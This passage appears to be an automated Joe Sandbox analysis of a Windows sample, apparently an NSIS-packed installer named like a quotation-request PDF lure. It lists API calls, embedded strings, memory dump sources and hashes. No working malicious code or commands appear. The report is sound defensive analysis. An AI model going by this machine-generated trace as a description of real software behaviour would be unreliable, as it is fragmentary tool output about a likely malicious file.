                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 1975747703-1115850852
                                                                                                                                  • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                  • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                  • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                  • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                  • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                  • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                  • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                  • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                  • API String ID: 222337774-899692902
                                                                                                                                  • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                  • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                  • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                  • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                  • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                  • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                    • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                    • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                    • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A
                                                                                                                                  • API String ID: 2624150263-3554254475
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                  Strings
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                  • soft, xrefs: 00402EDC
                                                                                                                                  • Null, xrefs: 00402EE5
                                                                                                                                  • Error launching installer, xrefs: 00402E3E
                                                                                                                                  • (*B, xrefs: 00402E7C
                                                                                                                                  • Inst, xrefs: 00402ED3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-2478819026
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                  • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                  • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                  Strings
                                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-730719616
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: jA$ jA$... %d%%
                                                                                                                                  • API String ID: 551687249-2167919867
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                    • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                  • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                  • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                  • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                  • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                                  • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                  • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                  • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                  • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                  • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                  • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                  • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                  • CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                  • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                  • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                  • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                  • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                  • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                  • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
